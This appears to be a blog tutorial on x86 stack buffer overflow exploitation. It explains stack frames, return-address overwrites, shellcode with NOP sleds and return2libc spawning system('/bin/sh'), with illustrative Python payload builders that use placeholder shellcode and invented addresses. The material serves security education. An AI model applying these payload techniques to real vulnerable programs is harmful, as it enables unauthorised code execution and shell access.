Art of PWN

x0j1 · December 31, 2019

Common registers

ESP

Stores the address of the top of the function call stack. Its value changes whenever data is pushed onto or popped off the stack.

EBP

Stores the base address of the current function's state (its stack frame). It does not change while the function is running, so function parameters and local variables can be located at fixed offsets from it.

EIP

Stores the address of the next instruction to be executed. The CPU reads and executes the instruction at the address held in EIP, and EIP then advances to the following instruction. This cycle repeats, so the program executes its instructions one after another.

Stack area changes during function call

First, the parameters are pushed onto the stack in reverse order.

Next, the address of the instruction that follows the call in the calling function (caller) is pushed onto the stack as the return address. In this way, the EIP (instruction) information of the caller is saved.

Then the current value of the EBP register (that is, the base address of the caller) is pushed onto the stack, and EBP is set to the current top-of-stack address. This saves the EBP (base address) information of the caller and, at the same time, makes EBP the base address of the called function (callee).

Finally, the local variables of the callee are pushed onto the stack. Everything on the stack from the return address onward, that is, everything except the call parameters, forms the state of the callee. When the call occurs, the program also loads the address of the callee's first instruction into the EIP register, so that it can go on to execute the callee's instructions in sequence.

Having seen what happens when a function call occurs, it's not difficult to understand the change at the end of the function call. The core task of the change is to discard the state of the callee and restore the top of the stack to the state of the caller.

First, the local variables of the called function (callee) are popped off the stack, which leaves the top of the stack at the callee's base address.

Then the caller's base address, which was saved at that location, is popped from the stack and stored in the EBP register. In this way, the EBP (base address) information of the calling function (caller) is restored. At this point, the top of the stack points to the return address.

The return address is then popped from the stack and stored in the EIP register. In this way, the EIP (instruction) information of the caller is restored.
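The call and return sequence described above can be sketched with a toy model. This is only an illustration under stated assumptions: the `ToyCPU` class, its method names, and every address are made up, and the stack is modelled as a dictionary rather than real memory.

```python
# Toy model of a 32-bit stack that grows toward lower addresses.
# ToyCPU and all addresses below are hypothetical, for illustration only.
class ToyCPU:
    def __init__(self):
        self.stack = {}            # address -> 32-bit value
        self.esp = 0x1000          # top of the stack
        self.ebp = 0x2000          # caller's base address (arbitrary)
        self.eip = 0x08048000      # some instruction in the caller

    def push(self, value):
        self.esp -= 4
        self.stack[self.esp] = value

    def pop(self):
        value = self.stack.pop(self.esp)
        self.esp += 4
        return value

    def call(self, args, callee_addr, return_addr, local_words):
        for arg in reversed(args):   # parameters are pushed in reverse order
            self.push(arg)
        self.push(return_addr)       # save the caller's EIP information
        self.eip = callee_addr       # start executing the callee
        self.push(self.ebp)          # save the caller's EBP
        self.ebp = self.esp          # EBP becomes the callee's base address
        self.esp -= 4 * local_words  # make room for local variables

    def ret(self):
        self.esp = self.ebp          # discard the callee's local variables
        self.ebp = self.pop()        # restore the caller's EBP
        self.eip = self.pop()        # restore the caller's EIP


cpu = ToyCPU()
caller_ebp = cpu.ebp
cpu.call(args=[1, 2], callee_addr=0x08049000,
         return_addr=0x08048005, local_words=4)
first_arg = cpu.stack[cpu.ebp + 8]   # first parameter sits at EBP + 8
cpu.ret()
```

After `ret()`, EBP and EIP hold the caller's values again. The two parameters are still on the stack in this model, because removing them is left to the caller.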

Stack overflow

While a function is executing its own instructions, we cannot get control of the program. Control of the program jumps between function states only when a function call begins or ends, so this is the point at which the attack has to be carried out.

Our goal is to have the EIP load the address of the attack instruction:

When the function returns and its state is popped off the stack, the return address is loaded into EIP, so we only need the overflow data to overwrite the return address with the address of the attack instructions.

We can also include a piece of attack instructions in the overflow data, or we can look for available attack instructions elsewhere in memory.

Alternatively, we can change the address that EIP is given when a function is called, so that a different function runs in its place.
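The effect of overflow data on the return address can be modelled with a byte array. This is a toy sketch, not a real exploit: `BUF_SIZE`, the helper names, and all addresses are hypothetical, and the frame is assumed to hold only a buffer, the saved EBP, and the return address.

```python
import struct

BUF_SIZE = 16  # hypothetical size of a local buffer in the callee


def build_frame(saved_ebp, return_addr):
    # Low to high addresses: [buffer][saved EBP][return address]
    return bytearray(b"\x00" * BUF_SIZE + struct.pack("<II", saved_ebp, return_addr))


def unchecked_copy(frame, data):
    # Mimics a copy without a bounds check: data longer than the
    # buffer spills into the saved EBP and the return address.
    frame[0:len(data)] = data
    return frame


def return_address(frame):
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


frame = build_frame(saved_ebp=0xBFFFF2B8, return_addr=0x08048005)
overflow = b"A" * (BUF_SIZE + 4) + struct.pack("<I", 0xDEADBEEF)
unchecked_copy(frame, overflow)
```

The 20 bytes of `A` fill the buffer and the saved EBP, and the next four bytes replace the return address, which is the value that will be loaded into EIP on return.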

StackOverflow stuff:

Modify the return address to point to a section of shellcode in the overflow data
Modify the return address to point to a function that already exists in memory (return2libc)
Modify the return address to point to existing instructions in memory (ROP)
Modify the address of a called function to point to another function (hijack GOT)

Shellcode:

The overflow data is made up of four parts, in this order: padding1, address of shellcode, padding2, shellcode.

The data at padding1 can be filled arbitrarily (note that if the program reads the overflow data as a string, it must not contain "\x00", otherwise the data will be truncated when it is passed to the program), and its length should be just enough to cover the function's saved base address. address of shellcode is the address at which the shellcode that follows begins, and it is used to overwrite the return address. The data at padding2 can also be filled arbitrarily, and its length is arbitrary. The shellcode should be in hexadecimal machine code format.
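The layout of padding1, address of shellcode, padding2, and shellcode can be sketched as a small helper. This is a minimal sketch assuming a 32-bit little-endian target; `build_shellcode_payload` is a hypothetical name, the address is made up, and `\xcc` bytes stand in for real shellcode.

```python
import struct


def build_shellcode_payload(offset, shellcode_addr, shellcode, padding2_len=0):
    padding1 = b"A" * offset                  # covers the buffer and the saved EBP
    ret = struct.pack("<I", shellcode_addr)   # overwrites the return address
    padding2 = b"B" * padding2_len            # arbitrary filler before the shellcode
    payload = padding1 + ret + padding2 + shellcode
    if b"\x00" in payload:
        # A string-based input routine would stop at the first NUL byte.
        raise ValueError("payload contains a NUL byte and would be truncated")
    return payload


# Hypothetical values: 24 bytes up to the return address, placeholder shellcode.
payload = build_shellcode_payload(24, 0xBFFFF2A8, b"\xcc" * 4, padding2_len=8)
```

The NUL check is only a convenience for the string-input case mentioned above. A program that reads raw bytes with an explicit length would not need it.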

According to the above construction, we have to solve two problems.

How long should the padding data (padding1) be before the return address?

We can use a debugging tool (such as gdb) to read the assembly code and work out this distance, or we can run the program repeatedly with input of increasing length (once the return address is overwritten with an invalid address such as "AAAA", the program terminates with an error).
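A common refinement of the increasing-length test is to send a pattern in which every four-byte window is unique, so that the value found in EIP after the crash reveals the distance directly. The sketch below is one way to do this in plain Python; `make_pattern` and `find_offset` are hypothetical helper names, and the crash value is simulated rather than taken from a real run.

```python
import string
import struct


def make_pattern(length):
    # Builds "Aa0Aa1Aa2..." from upper/lower/digit triples.
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("length too large for this simple pattern")


def find_offset(pattern, eip_value):
    # EIP holds four pattern bytes read as a little-endian integer.
    return pattern.find(struct.pack("<I", eip_value))


pattern = make_pattern(200)
# Simulated crash: pretend the debugger reported this value in EIP.
crashed_eip = struct.unpack("<I", pattern[28:32])[0]
offset = find_offset(pattern, crashed_eip)
```

The returned offset is the length to use for padding1. `find_offset` returns -1 if the value does not occur in the pattern.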

What should the shellcode start address be?

We can check the location of the return address in the debugging tool (view the content of EBP and add 4 on a 32-bit machine; see the explanation of the function state above). However, the address seen in the debugging tool is not the same as the one during a normal run, because of factors such as runtime environment variables. So we can only get an approximate shellcode start address this way. The solution is to fill padding2 with a run of "\x90" bytes. The instruction corresponding to this machine code is NOP (No Operation): it tells the CPU to do nothing and move on to the next instruction. With this run of NOPs in place, as long as the return address lands anywhere inside it, execution slides to the beginning of the shellcode without side effects, which is why the method is called a NOP sled. The NOP padding therefore makes up for the inaccuracy of the experimentally determined shellcode start address.
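The NOP sled variant can be sketched as follows, again assuming a 32-bit little-endian target. `build_sled_payload` is a hypothetical helper, `ret_slot_addr` stands for the approximate location of the return address read from the debugger, and aiming at the middle of the sled is just one reasonable choice.

```python
import struct

NOP = b"\x90"


def build_sled_payload(offset, ret_slot_addr, sled_len, shellcode):
    sled_start = ret_slot_addr + 4        # first byte after the return address
    target = sled_start + sled_len // 2   # aim for the middle of the sled
    payload = (b"A" * offset              # padding1
               + struct.pack("<I", target)
               + NOP * sled_len           # padding2 filled with NOPs
               + shellcode)
    return payload, target


# Hypothetical values; b"\xcc" * 4 is a placeholder, not real shellcode.
payload, target = build_sled_payload(24, 0xBFFFF29C, 64, b"\xcc" * 4)
```

With a 64-byte sled aimed at its middle, the real address may differ from the debugger's estimate by roughly 32 bytes in either direction and execution still reaches the shellcode.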

The operating system can randomize the starting address of the function call stack (this technique is called memory layout randomization, or Address Space Layout Randomization (ASLR)), so that the location of the function's return address changes randomly each time the program runs. Conversely, if the operating system has this randomization turned off (which is a precondition for this technique to work), the location of the return address is the same on every run. We can then generate a core file by entering invalid overflow data, and use the debugging tool to find the location of the return address in the core file, which gives us the starting address of the shellcode.

After solving the above problems, we can stitch the final overflow data and enter it into the program to execute the shellcode.

One prerequisite for this method is that the data (shellcode) on the function call stack must be executable (the other prerequisite is that the memory layout randomization mentioned above is turned off). The operating system often removes execute permission from the function call stack, which defeats the shellcode method. We can still try to use instructions or functions that already exist in memory: these parts are executable anyway, so the restriction on stack execution does not affect them. This approach includes two methods, return2libc and ROP.

Return2libc

Determine the address of a function in memory and overwrite the return address with it. Because the functions in the libc dynamic link library are so widely used, there is a high probability that this library is already present in memory. The library also contains system-level functions (such as system()), which are commonly used to gain control of the current process. The function to be executed may require parameters: for example, opening a shell means calling system("/bin/sh") in full, so the overflow data must also include the necessary parameters. The following takes the execution of system("/bin/sh") as an example, first writing out the composition of the overflow data and then determining what to fill into each part.

The overflow data is made up of four parts, in this order: padding1, address of system(), padding2, address of "/bin/sh".

The data at padding1 can be filled arbitrarily (be careful not to include "\x00", otherwise the overflow data will be truncated when it is passed to the program), and its length should be just enough to cover the function's saved base address. address of system() is the address of system() in memory, and it is used to overwrite the return address. The data at padding2 is 4 bytes long (32-bit machine) and corresponds to the return address used when system() returns. Because we only need to open a shell here and do not care what happens after the shell exits, padding2 can be filled arbitrarily. address of "/bin/sh" is the address of the string "/bin/sh" in memory, passed as the parameter to system().
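The return2libc layout (padding1, address of system(), padding2, address of "/bin/sh") can be sketched as follows. This is a minimal sketch assuming a 32-bit little-endian target; `build_ret2libc_payload` is a hypothetical name and both addresses are invented placeholders, not values from a real libc.

```python
import struct


def build_ret2libc_payload(offset, system_addr, binsh_addr, fake_ret=0x42424242):
    return (b"A" * offset                       # padding1: buffer and saved EBP
            + struct.pack("<I", system_addr)    # overwrites the return address
            + struct.pack("<I", fake_ret)       # padding2: return address for system()
            + struct.pack("<I", binsh_addr))    # parameter passed to system()


# Hypothetical addresses for illustration only.
payload = build_ret2libc_payload(24, 0xB7E5F460, 0xB7F81FF8)
```

The three words after padding1 mimic what system() expects to find on the stack on entry: its own return address, followed by its first parameter.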

According to the above construction, we have to solve three problems.

How long should the padding data (padding1) be before the return address?

The answer is the same as the one given in the shellcode section.

What should the system() function address be?

To answer this question, we need to look at how the program calls functions in a dynamic link library. When a function is dynamically linked into a program, the program first determines the starting address of the dynamic link library in memory and then adds the relative offset of the function within the library to obtain the absolute address of the function in memory. Determining the memory address of the dynamic library brings us back to the memory layout randomization (ASLR) mentioned in the shellcode section, because this technique also randomizes the address at which the dynamic library is loaded. If the operating system has ASLR turned on, the starting address of the dynamic library changes every time the program runs, so the absolute address of a function in the library cannot be determined in advance. If ASLR is turned off, we can use the debugging tool while the program is running to look up the address of system() directly, or to look up the starting address of the dynamic library in memory, then find the relative offset of the function within the library and calculate the absolute address from the two.
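The calculation of start address plus relative offset can be sketched as follows. On Linux, one place to read the library's start address is the process memory map (`/proc/<pid>/maps`); the sample text, file paths, and offset below are invented for illustration, and `library_base` and `absolute_address` are hypothetical helper names.

```python
# Invented sample in the style of /proc/<pid>/maps; not from a real process.
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 131 /home/user/vuln
b7e19000-b7fc4000 r-xp 00000000 08:01 262 /lib/i386-linux-gnu/libc-2.19.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
"""


def library_base(maps_text, name="libc"):
    # Returns the start address of the first mapping whose path contains name.
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and name in fields[5]:
            return int(fields[0].split("-")[0], 16)
    return None


def absolute_address(lib_base, symbol_offset):
    # Absolute address = library start address + relative offset (32-bit).
    return (lib_base + symbol_offset) & 0xFFFFFFFF


base = library_base(SAMPLE_MAPS)
system_addr = absolute_address(base, 0x40310)  # 0x40310 is a made-up offset
```

The relative offset itself would come from inspecting the library file, for example with a symbol-listing tool. With ASLR on, `base` would differ on every run and the result would not carry over.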

Finally, what is the address of "/bin/sh"?

You can search for this string in the dynamic library. If it exists there, its absolute address is the starting address of the dynamic library plus the relative offset of the string. If it cannot be found in the dynamic library, you can put the string into an environment variable and then use a function such as getenv() to determine its address.

After solving the above problems, we can splice together the overflow data and enter it into the program to open a shell through system().
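Searching the library for the string can be sketched as a byte search. This is a simplified sketch: `find_string_address` is a hypothetical helper, the image below is synthetic rather than a real libc, and the code assumes the string's offset in the file equals its offset from the library's start address in memory, which should be checked against the real library.

```python
def find_string_address(lib_image, lib_base, needle=b"/bin/sh\x00"):
    # Offset of the string within the library image, or -1 if absent.
    offset = lib_image.find(needle)
    if offset < 0:
        return None
    return lib_base + offset


# Synthetic stand-in for the library file contents.
fake_image = b"\x7fELF" + b"\x00" * 100 + b"/bin/sh\x00" + b"\x00" * 16
binsh_addr = find_string_address(fake_image, 0xB7E19000)
```

For a real library, `lib_image` would be the bytes read from the library file on disk. A `None` result corresponds to the case where the string has to be supplied another way, such as through an environment variable.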

Both methods work by overwriting the return address, either to execute an instruction fragment supplied in the input (shellcode) or to execute a function in the dynamic library (return2libc). Note that both require the operating system to have memory layout randomization (ASLR) turned off, and the shellcode method also requires the program's call stack to be executable.